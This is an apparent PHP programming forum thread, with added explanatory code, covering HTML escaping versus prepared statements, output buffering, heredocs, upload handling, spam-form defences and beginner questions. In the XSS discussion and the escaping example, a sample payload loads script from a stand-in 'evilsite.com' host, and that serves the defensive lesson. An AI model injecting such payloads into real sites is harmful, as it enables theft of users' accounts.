Hammerite posted:
But unless I misunderstand, they won't log in, will they? They'll just join in on a session that's already logged in.

The way I understand it, that doesn't happen because they don't have the cookie, just the ID. So unless your website just throws out cookies when people go to it, they would have to log in first, then receive the cookie which has the session ID that they gave it. Or something.

# ? Apr 10, 2012 16:33

Sab669 posted:
Could you elaborate on this? Basically what the page was doing was auto-populating a form with that user's information from the database when they click to view their own profile for editing it. Also, as far as sanitizing input, everything is done through prepared statements.

I think musclecoder assumed you were printing out something submitted via a post or get request. You should be fine if you can verify your data's been sanitized.

# ? Apr 10, 2012 21:48

Sab669 posted:
Could you elaborate on this? Basically what the page was doing was auto-populating a form with that user's information from the database when they click to view their own profile for editing it. Also, as far as sanitizing input, everything is done through prepared statements.

What if I tell the system that my first name is <script src='http://evilsite.com/steal-your-account.js'>, and someone else views my profile page? Or if the viewing-your-profile page is already done and is different to this, why not just look at how it's done there?

# ? Apr 10, 2012 22:31

Sab669 posted:
Also, as far as sanitizing input, everything is done through prepared statements.

Didn't see this yesterday, but... You appear not to have a good understanding of what it means to "sanitise" data. Prepared statements are a way to make sure communication with the database is safe from certain kinds of exploits. This is a completely different concern from that. The point being made is that if you accept arbitrary input from a user and echo it back out onto an HTML page then it could contain exploits that target users' browsers, rather than databases. There is no such thing as "just sanitising" data. Talking about sanitising data is meaningless unless you specify with respect to what set of concerns the data has been sanitised. Has it been sanitised for a database connection, for an HTML page, for a filesystem...?

# ? Apr 11, 2012 11:14

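The point Hammerite and Jabor are making, as an added example that is not code from the thread: the same stored value is perfectly safe as a bound parameter and still dangerous when echoed into HTML, so it has to be escaped for the HTML context at output time. The profile row is constructed; the first name is the payload quoted above.

```php
<?php
// Added example, not code from the thread. Shows why "sanitised for the
// database" says nothing about "safe for HTML": the same stored value is
// fine as a bound parameter but must be escaped again when it is echoed.

// Constructed sample row, as if fetched from the profile table by a
// prepared statement; the first name is the payload from the thread.
$user = [
    'first_name' => "<script src='http://evilsite.com/steal-your-account.js'>",
    'last_name'  => "O'Brien",
];

// Escape a value for an HTML text or attribute context. ENT_QUOTES also
// encodes single quotes, which matters inside value='...' attributes.
function h($value)
{
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Vulnerable: the stored value lands in the markup verbatim, so the quote in
// it closes the attribute and the script tag becomes part of the page.
function renderProfileFormUnsafe(array $user)
{
    return "<input name='first_name' value='{$user['first_name']}'>";
}

// Fixed: every dynamic value is escaped for the context it is written into.
function renderProfileForm(array $user)
{
    return "<input name='first_name' value='" . h($user['first_name']) . "'>\n"
         . "<input name='last_name' value='" . h($user['last_name']) . "'>";
}

echo renderProfileFormUnsafe($user), "\n"; // the attribute is broken out of
echo renderProfileForm($user), "\n";       // the browser shows text, runs nothing
```

The same value would need a different escaper again if it went into a JavaScript string, a URL or a shell command, which is exactly why "sanitised" on its own says nothing.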
Hammerite posted:
Didn't see this yesterday, but... You appear not to have a good understanding of what it means to "sanitise" data. Prepared statements are a way to make sure communication with the database is safe from certain kinds of exploits. This is a completely different concern from that. The point being made is that if you accept arbitrary input from a user and echo it back out onto an HTML page then it could contain exploits that target users' browsers, rather than databases.

Yea, after seeing Jabor's post I see what you guys mean. I've just always only heard the term used in reference to SQL injection, really.

# ? Apr 11, 2012 17:36

I'm using a bunch of classes in a certain namespace Foo which sometimes dump out some debug info to stdout, which I'd prefer to not dump to the website. So I'd like to start output buffering before those methods are called, and then flush the OB after the method returns. Now, I could just wrap all of the method calls myself:
php:
<?php
ob_start();                                   // buffer everything the chatty call prints
$widget = (new \Foo\Widget())->doSomething(); // instantiate, then call the method
ob_end_clean();                               // discard the buffered debug output
?>
Deus Rex fucked around with this message at 03:55 on Apr 15, 2012
# ? Apr 15, 2012 03:42

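One way to avoid wrapping every call by hand, as an added example that is not Deus Rex's code: a small helper that runs any callable with output buffering on and always pops the buffer again, even when the callable throws. \Foo\Widget here is a constructed stand-in for the chatty library class, and the helper names are assumptions.

```php
<?php
// Added example, not code from the post. \Foo\Widget is a constructed
// stand-in for the chatty library class; the helper names are mine.
namespace Foo {
    class Widget
    {
        public function doSomething()
        {
            echo "DEBUG: widget starting\n"; // the noise we want kept off the page
            return 42;
        }
    }
}

namespace {
    // Run a callable with stdout buffered, discard the buffer and return the
    // callable's result. try/finally pops the buffer even when $fn throws,
    // so the ob_* nesting level is always left as it was found.
    function withSuppressedOutput(callable $fn)
    {
        ob_start();
        try {
            return $fn();
        } finally {
            ob_end_clean();
        }
    }

    // Same idea, but hand the captured text back so it can go to a log file
    // instead of being lost, which is usually what you want for debug output.
    function withCapturedOutput(callable $fn, &$captured)
    {
        ob_start();
        try {
            return $fn();
        } finally {
            $captured = ob_get_clean();
        }
    }

    $widget = new \Foo\Widget();

    $result = withSuppressedOutput(function () use ($widget) {
        return $widget->doSomething();
    });
    echo "result: $result\n"; // only this line reaches the browser

    $debug = '';
    withCapturedOutput(function () use ($widget) { return $widget->doSomething(); }, $debug);
    error_log(trim($debug)); // the debug chatter ends up in the error log instead
}
```

If you forget to pop a buffer, everything the page prints afterwards is swallowed too, which is why the finally block matters more than it looks.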
I'm tracking items on Newegg by using cURL to pull the source of the page and then going through that to pull details for each item. The problem I'm having is that the price doesn't actually seem to show up in the source of the page. I can't really tell what's going on, but I'm guessing it's displayed using javascript or iframes or something. Can anyone shine some light on what's going on here or if there's a way to grab the page after all the javascript runs?
hayden. fucked around with this message at 22:54 on Apr 15, 2012
# ? Apr 15, 2012 22:49

If it is populated by javascript, then the javascript has to get it from somewhere. I find that firebug helps me find this kind of stuff every so often. I don't have any recent orders from newegg, so I can't track it down. But looking at their page, I see some JSON script, which I suspect may just be where it's getting the data. Probably not all that helpful, but I tried to give my two cents.

# ? Apr 15, 2012 23:04

They have RSS feeds, could you grab the price data from it? http://www.newegg.com/Product/RSS.aspx?Submit=RSSCategorydeals&Depa=0&Category=228&NAME=Desktop-PCs for example.

# ? Apr 16, 2012 00:32

Thanks for the feedback, guys. Turns out the search pages have the price right there in the source so I'll get it from that.

# ? Apr 16, 2012 04:09

hayden. posted:
I'm tracking items on Newegg by using cURL to pull the source of the page and then going through that to pull details for each item.

http://content.newegg.com/LandingPage/ItemInfo4ProductDetail.aspx?Item=N82E16826106455

# ? Apr 16, 2012 04:58

Awesome, thanks.

# ? Apr 16, 2012 12:06

Is it possible to set the value of a PHP variable in a .htaccess file? For example, can I create a .htaccess file such that when visited, this script outputs '3' to the browser? code:
Note 2: It is also acceptable for the prepopulated entity to be a PHP constant, rather than a PHP variable (so the above line of PHP would instead be something like echo MY_VARIABLE;).

# ? Apr 16, 2012 21:22

You can set an environment variable in your .htaccess file that you can access in PHP.
.htaccess code:
code:
http://www.php.net/manual/en/function.getenv.php

# ? Apr 16, 2012 21:34

ecsyle posted:
You can set an environment variable in your .htaccess file that you can access in php

Thanks, this does what I wanted. I didn't know about environment variables.

# ? Apr 17, 2012 13:31

I decided it was a good idea to separate out things that I wrote to ease the pain of writing PHP, so that they are in discrete libraries, rather than just copy-and-pasting versions of them into things I work on and making ad-hoc changes. The first thing I did it with was this. It is intended to allow creation of HTML pages as PHP objects. Yes I know there are a plethora of things like that already. You are welcome to look at it and tell me it sucks (as long as you tell me why it sucks). The version there is hardly tested at all by the way.

# ? Apr 18, 2012 16:23

I am looking at example code for jqGrid and they have a section where you assign some jQuery code to a variable. The problem that I have is Dreamweaver doesn't seem to recognize <<<CUSTOM ... CUSTOM; and if I try to run it on our PHP server anyway, then I'll get the following error:
quote:
Parse error: syntax error, unexpected T_SL in /*filepath*/getRowGrid.php on line 30
code:
Aniki fucked around with this message at 22:20 on Apr 18, 2012
# ? Apr 18, 2012 22:13

code:
You have stuff after <<<CUSTOM. even "<<<CUSTOM " (with a space) won't work, because "CUSTOM;" -> "CUSTOM" doesn't match "CUSTOM " I guess?

# ? Apr 18, 2012 22:26

Aniki posted:
I know that I've encountered the <<<CUSTOM ... CUSTOM; block before, but I can't remember how I handled it and I haven't had any luck searching on Google for it either. Is there a different way that I need to format it or is this something that is only supported in certain versions of PHP?

I attempted to answer your question and then saw that Biowarfare had answered it. Just to say, a string written that way is called a heredoc, in case you need to search for details of it in future.

# ? Apr 18, 2012 22:36

Hammerite posted:
I attempted to answer your question and then saw that Biowarfare had answered it. Just to say, a string written that way is called a heredoc, in case you need to search for details of it in future.

I was a little confused by Biowarfare's answer, but it's starting to make sense now and I did see that after I removed the space after <<<CUSTOM that DreamWeaver no longer alerted me for an error for that line. Thank you for providing the heredoc term, that should make it a lot easier for me to search for info on this.

Edit: I got it working now, thank you to Hammerite and Biowarfare for your help.
Aniki fucked around with this message at 22:52 on Apr 18, 2012
# ? Apr 18, 2012 22:46

code:
output posted:
my guid (getmyguid): 502

I'm trying to understand why this path is not writable. Permission bits are 0750. When executing under CLI as the same user (xyz:x:502:xyz) it works fine. The user is being set via a setuid flag (u+s), and I'm beginning to suspect that even though it's running as that user, something else isn't being updated to the process. I'm not proficient enough with unix permissions to sort this out. Anyone have any ideas? (the code is just hacked together to make sure the plumbing was 'correct'). If it wasn't obvious by the array function result access, this is PHP 5.4, but nothing has changed in the related functions as far as I can tell.

# ? Apr 24, 2012 01:42

Oversaucy posted:
is_writable() doesn't check effective permissions, it checks to see if the owner of the file matches and the write permission bit is set. Given that you're using setuid, I suspect that's the problem.

# ? Apr 24, 2012 04:41

So I'm thinking that there must be a better way to approach a problem. I have a number of remote systems uploading (zipped) log files by ftp. I'm setting up a cron job on my server to check the log directory every minute to check every file in it, unzip and insert into the db. I'm doing sanitisation and discarding invalid zip files - since the files get uploaded over temperamental connections, incomplete uploads are not uncommon and not a big problem - but I would like to ensure that files are properly uploaded before trying to open or work with them so that my own script doesn't cause problems with the logging process. The way I see it, I can either have the script check the file timestamp and only work on the file after two or three minutes, I could use a separate table to monitor timestamps and file size and work from there, or I could only discard the zip as bad after two or three attempts, though I don't know how file locking may affect that. Ultimately, I feel like I'm missing some much simpler option. While I'd rather not open up php to exec() functions for security reasons, it's a virtual server so I can handle things at a shell level and move only known good files to the directory for php to check. Any ideas?

# ? Apr 29, 2012 16:04

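The "only touch a file after it has stopped changing, then move it out of the way" approach the post sketches, as an added example that is not the poster's script. The directory names and the three-minute quiet period are assumptions.

```php
<?php
// Added example, not the poster's code. The directory names and the
// three-minute quiet period are assumptions. Only files that have stopped
// changing are touched, each is validated as a zip, and it is moved out of the
// upload directory exactly once, so a still-growing upload is never opened.
const INCOMING  = '/srv/ftp/logs';     // where the remote systems upload to
const WORK_DIR  = '/srv/import/work';  // same filesystem, so rename() is atomic
const BAD_DIR   = '/srv/import/bad';   // kept for inspection, never retried
const QUIET_SEC = 180;                 // untouched for 3 minutes = complete

// Returns the paths in $incoming that are safe to import on this run.
function collectCompleteUploads($incoming, $quietSeconds, $now)
{
    $ready = [];
    $paths = glob($incoming . '/*.zip') ?: [];
    foreach ($paths as $path) {
        clearstatcache(true, $path);
        // Still being written: the FTP server bumps mtime with every chunk.
        if ($now - filemtime($path) < $quietSeconds) {
            continue;
        }
        // A zero-byte file is the usual remnant of a transfer that never started.
        if (filesize($path) === 0) {
            continue;
        }
        $ready[] = $path;
    }
    return $ready;
}

// Opens the archive with consistency checks; a truncated upload fails here,
// before the importer ever sees it.
function isValidZip($path)
{
    $zip = new ZipArchive();
    $ok  = $zip->open($path, ZipArchive::CHECKCONS);
    if ($ok === true) {
        $zip->close();
    }
    return $ok === true;
}

foreach (collectCompleteUploads(INCOMING, QUIET_SEC, time()) as $path) {
    $dest = (isValidZip($path) ? WORK_DIR : BAD_DIR) . '/' . basename($path);
    // rename() on one filesystem is atomic: overlapping cron runs cannot both
    // pick up the same file, the loser just gets false back.
    if (!rename($path, $dest)) {
        error_log("could not move $path");
    }
}
```

If your FTP server lets clients set a file's modification time after upload, trust mtime less: record size and mtime per file and only import once two consecutive runs have seen the same values.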
Alright, I've been Googling on and off for a few days and I'm hoping there's a simple solution- Web form spam. I've got a form, and the action goes to send_email_form.php. I pull the info from $_POST, sanitize it and do some regex for sanity checks. I've received a couple hundred fake form submissions, so out of naivety I built a little javascript captcha for the form itself. I don't even think that made a dent- I suspect that there's a script that's just directly accessing send_email_form.php. Past basic sanity checks, I haven't really seen much when googling around for 'prevent web form spam' and other queries like that. Does anyone have some tips/resources? edit: Do you think it's as simple as hiding a form field with CSS, and if it's been filled out to toss the request?

# ? May 2, 2012 13:58

Yeah, a hidden field will work most of the time. Do it.

# ? May 2, 2012 14:31

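The hidden-field check from the question, plus one more cheap server-side test that a script posting straight at send_email_form.php will fail, as an added example that is not the poster's handler. The field names and the secret are assumptions.

```php
<?php
// Added example, not the poster's send_email_form.php. Field names are
// assumptions. Two server-side checks a bot that posts directly to the
// handler tends to fail: a CSS-hidden honeypot field that humans never fill,
// and an HMAC-signed timestamp proving the form was rendered by this server
// a plausible number of seconds ago.
const FORM_SECRET = 'REPLACE-WITH-A-RANDOM-SECRET-FROM-CONFIG'; // placeholder

// Call when rendering the form and emit the result in a hidden field "ft".
// The honeypot is a normal-looking input, hidden with CSS, e.g.
//   <input name="website" style="display:none" tabindex="-1" autocomplete="off">
function issueFormToken($now)
{
    return $now . ':' . hash_hmac('sha256', (string) $now, FORM_SECRET);
}

// Returns null when the submission looks human, otherwise the reason.
function rejectReason(array $post, $now, $minSeconds = 3, $maxSeconds = 3600)
{
    // Honeypot: a real visitor never sees the field, so it must stay empty.
    if (!empty($post['website'])) {
        return 'honeypot filled';
    }
    if (empty($post['ft']) || strpos($post['ft'], ':') === false) {
        return 'missing token';
    }
    list($issued, $mac) = explode(':', $post['ft'], 2);
    if (!ctype_digit($issued)) {
        return 'bad token';
    }
    // Constant-time compare so the MAC cannot be guessed byte by byte.
    if (!hash_equals(hash_hmac('sha256', $issued, FORM_SECRET), $mac)) {
        return 'bad token';   // forged or altered timestamp
    }
    $age = $now - (int) $issued;
    if ($age < $minSeconds) {
        return 'submitted too fast';   // scripts post within a second of loading
    }
    if ($age > $maxSeconds) {
        return 'token expired';
    }
    return null;
}

// Constructed submissions: a human, then two scripts hitting the handler directly.
$token = issueFormToken(time() - 20);
var_dump(rejectReason(['website' => '', 'ft' => $token, 'msg' => 'hi'], time()));   // form rendered 20 s ago, honeypot empty
var_dump(rejectReason(['website' => 'http://spam.example', 'ft' => $token], time())); // honeypot filled
var_dump(rejectReason(['ft' => '1:deadbeef'], time()));                               // forged token
```

Log the reject reasons for a week before acting on them: the counts tell you which check is actually catching the traffic you see.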
I apologize in advance if this is a dumb question, I'm really a novice when it comes to php. I have a date field from a database that comes in like this "2012-04-08" I have some images that I have to tie in to those dates. (one to one) The images are labeled "img_120408.jpeg" How can I convert "2012-04-08" to display as "120408"?

# ? May 2, 2012 17:29

stoops posted:
I apologize in advance if this is a dumb question, I'm really a novice when it comes to php.

php:
<?php echo 'img_' . date('ymd', strtotime('2012-04-08')) . '.jpeg'; ?>

# ? May 2, 2012 17:36

stoops posted:
I apologize in advance if this is a dumb question, I'm really a novice when it comes to php.

code:
quote:
img_120408.jpeg

# ? May 2, 2012 17:37

stoops posted:
I apologize in advance if this is a dumb question, I'm really a novice when it comes to php.

$newDate = date('ymd', strtotime('2012-04-08'));

# ? May 2, 2012 17:37

stoops posted:
I apologize in advance if this is a dumb question, I'm really a novice when it comes to php.

$date = "2012-04-08";
echo substr($date,2,2).substr($date,5,2).substr($date,8,2);

or a regular expression

echo preg_replace('/\d{2}(\d{2})-(\d{2})-(\d{2})/',"$1$2$3",$date);

You could also use the DateTime class and let PHP figure it out for you.

$datetime = new DateTime($date);
echo $datetime->format('ymd');

e: or you could spend way too much time answering a simple question and get beaten horribly.

# ? May 2, 2012 17:45

IT Guy, Biowarfare, Null Set and Doctor rear end in a top hat: Thanks, I appreciate it. (I ended up using Null Set's version)

# ? May 2, 2012 18:07

Pre-emptive security alert. The thing going around about being able to view the source of any random PHP script? It relies on using mod_cgid, something you are almost certainly not running. It's not mod_php, it's not mod_fastcgi, it's not mod_fcgid, and it's most certainly not mod_cgi.

# ? May 3, 2012 09:24

I've been progressively getting better at writing out PHP and want to tackle converting my current site into OOP. Is there a definitive resource for PHP's OOP construction, or is it all basically the same formatting?

# ? May 3, 2012 14:17

I need a Codeigniter-based CMS that's not EE. I'm probably going to use PyroCMS. Does anyone have anything bad to say about PyroCMS? Is there anything better?

# ? May 7, 2012 16:24

I have this code:
code:
How can I put the $lines all in one variable called output?

# ? May 9, 2012 21:34

Can't you just do $output += $line; inside your while loop?

# ? May 9, 2012 21:39

excidium posted:
Can't you just do $output += $line; inside your while loop?

This being PHP and not Javascript, you'd want .= instead of +=.

# ? May 9, 2012 21:59

I wrote a .net web service for a guy who is using php and I believe it's the first web service he has ever worked with and he's having issues. The web service works no problem from .net. I added POST/GET methods per his request, however I think he switched to using SOAP. He's getting this error: "Value cannot be null. Parameter name: g". The result he should be getting (given the arguments passed in) is "Invalid VendorID". Here is his code:
code:
Essential fucked around with this message at 03:38 on May 13, 2012
# ? May 10, 2012 20:00

So I gave up trying to start with node.js, and have turned to trying my hand at PHP since w3schools has a tutorial for it (which is easier for me to digest) Anyways, for some reason I've confused myself at how to setup my computer to do php. I tried some simple stuff like printing Hello World but nothing shows. It's a blank page. I ended up downloading a number of different php binaries (thread safe and non thread safe?) and I think an Apache server which I don't know how to work... and I'm not even sure what Netbeans might have added in addition. Basically somehow I've confused myself. Anyone have like a 1. 2. 3. step guide of what to do from a clean slate just to get me on my feet so I can start learning and practicing php? Sorry for sounding like an idiot.

# ? May 13, 2012 00:37

I'm assuming Windows here; what I'd suggest is uninstalling all that stuff. I've had a dedicated server for quite a while, but if I recall WAMP wasn't that bad: http://www.wampserver.com/en/ (Windows Apache MySQL PHP) You can choose to add/remove things like MySQL if you feel you don't need that yet.
|
# ? May 13, 2012 00:48 |